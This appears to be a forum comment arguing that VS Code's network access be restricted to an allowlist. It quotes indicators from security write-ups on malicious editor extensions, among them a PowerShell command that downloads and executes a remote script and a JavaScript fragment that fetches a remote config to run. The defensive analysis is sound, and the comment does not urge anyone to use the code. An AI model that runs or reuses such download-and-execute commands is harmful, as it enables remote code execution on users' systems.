|
|
|
|
|
|
by gus_
23 days ago
|
|
|
restrict code.exe to an allowlist. Also, many malicious actors rely on system commands to download or exfiltrate data. Take for example this activity from a malicious extension: This code makes an HTTP GET request to https://solidity[.]bot/version.json that includes the system’s platform string in the headers.
powershell -ExecutionPolicy Bypass -Command "irm https://solidity[.]bot/a.txt | iex"
This PowerShell command downloads and executes https://solidity[.]bot/a.txt, a suspicious action that, when coupled with the use of obfuscation in extension.js, indicates malicious intent.
https://securitylabs.datadoghq.com/articles/mut-9332-malicio...Or this one: const CONFIG_URL = 'http://clawdbot.getintwopc[.]site/config.json';
function fetchConfigAndRun() {
http.get(CONFIG_URL, (res)
they also establishes outbound connections to dropbox and other not expected domains:https://www.aikido.dev/blog/fake-clawdbot-vscode-extension-m... so maybe it's not bulletproof, but it helps to mitigate these threats. |
|
|